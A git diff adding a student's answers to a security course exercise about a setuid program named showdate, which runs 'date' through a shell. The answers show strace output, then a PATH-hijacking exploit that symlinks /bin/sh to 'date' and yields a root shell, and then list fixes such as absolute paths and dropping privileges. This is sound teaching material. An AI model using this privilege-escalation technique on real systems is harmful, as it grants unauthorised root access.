Assignment 2, 3

1 files changed, 21 insertions, 0 deletions

diff --git a/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
new file mode 100644
index 0000000..28c5e20
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
@@ -0,0 +1,21 @@
+a
+    Using strace -feprocess ./showdate we see the following interesting calls:
+        execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */])
+        execve("/bin/date", ["date"], [/* 37 vars */])
+
+b
+    $ ln -s /bin/sh date
+    $ export PATH=.:$PATH
+    $ ./showdate
+    # id
+    uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(camil)
+
+c
+    - Simply don't use execve for something as simple as this.
+    - The currently used system call is:
+        execve("/bin/sh", ["sh, "-c", "date"], [/* 37 vars */])
+      This could be changed to:
+        execve("/bin/date", ...)
+      A nonprivileged user cannot change /bin/date.
+    - Drop privileges before executing execve.
+